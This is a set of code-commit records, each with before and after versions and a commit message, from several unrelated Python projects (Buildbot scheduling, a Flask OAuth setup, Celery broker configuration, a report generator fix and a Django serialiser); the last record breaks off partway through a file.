<commit_msg>Buildbot: Add a scheduler for the master branch to run<commit_after>
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
Buildbot: Add a scheduler for the master branch to run"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
<commit_before>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
<commit_msg>Buildbot: Add a scheduler for the master branch to run<commit_after>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
9e6621ac7e4f07b9272ddb144aebbb75826d2405
|
src/flock.py
|
src/flock.py
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOKK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/auth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.togengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
Switch to Flask, add oauth
|
Switch to Flask, add oauth
|
Python
|
agpl-3.0
|
DavidJFelix/hatchit,DavidJFelix/hatchit,DavidJFelix/hatchit
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
Switch to Flask, add oauth
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOKK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/auth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.togengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
<commit_before>#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
<commit_msg>Switch to Flask, add oauth<commit_after>
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOKK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/auth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.togengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
Switch to Flask, add oauth#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOKK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/auth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.togengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
<commit_before>#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
<commit_msg>Switch to Flask, add oauth<commit_after>#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOKK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/auth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.togengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
5f63a4cddc1157e1b0cb085562ee16e55f1c88b5
|
cesium/celery_app.py
|
cesium/celery_app.py
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
Allow broker to be overridden
|
Allow broker to be overridden
|
Python
|
bsd-3-clause
|
mltsp/mltsp,acrellin/mltsp,bnaul/mltsp,bnaul/mltsp,bnaul/mltsp,acrellin/mltsp,mltsp/mltsp,mltsp/mltsp,acrellin/mltsp,acrellin/mltsp,mltsp/mltsp,bnaul/mltsp,mltsp/mltsp,bnaul/mltsp,bnaul/mltsp,acrellin/mltsp,acrellin/mltsp,mltsp/mltsp
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
Allow broker to be overridden
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
<commit_before>from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
<commit_msg>Allow broker to be overridden<commit_after>
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
Allow broker to be overriddenfrom celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
<commit_before>from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
<commit_msg>Allow broker to be overridden<commit_after>from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
a17aade30c5925ba40eacfa2ab2a067a9141aa84
|
tests/__init__.py
|
tests/__init__.py
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
Make run_tests run all tests if no arguments are provided.
|
Make run_tests run all tests if no arguments are provided.
|
Python
|
bsd-3-clause
|
BGCX262/zvm-hg-to-git,BGCX262/zvm-hg-to-git
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
Make run_tests run all tests if no arguments are provided.
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
<commit_before>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
<commit_msg>Make run_tests run all tests if no arguments are provided.<commit_after>
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
Make run_tests run all tests if no arguments are provided.#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
<commit_before>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
<commit_msg>Make run_tests run all tests if no arguments are provided.<commit_after>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
84af834a348097f493b1e63034c8d0487354d737
|
qanta/reporting/report_generator.py
|
qanta/reporting/report_generator.py
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
Fix bug where there was an empty report
|
Fix bug where there was an empty report
|
Python
|
mit
|
miyyer/qb,miyyer/qb,Pinafore/qb,miyyer/qb,miyyer/qb,Pinafore/qb
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
Fix bug where there was an empty report
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
<commit_before>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
<commit_msg>Fix bug where there was an empty report<commit_after>
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
Fix bug where there was an empty reportfrom jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
<commit_before>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
<commit_msg>Fix bug where there was an empty report<commit_after>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
5ee94e9a74bc4128ed8e7e10a2106ea422f22757
|
sandbox/sandbox/polls/serialiser.py
|
sandbox/sandbox/polls/serialiser.py
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
Add attribute to choices field declaration
|
Add attribute to choices field declaration
|
Python
|
bsd-3-clause
|
MarkusH/django-nap,limbera/django-nap
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
Add attribute to choices field declaration
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
<commit_before>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
<commit_msg>Add attribute to choices field declaration<commit_after>
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
Add attribute to choices field declaration
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
<commit_before>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll,')
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
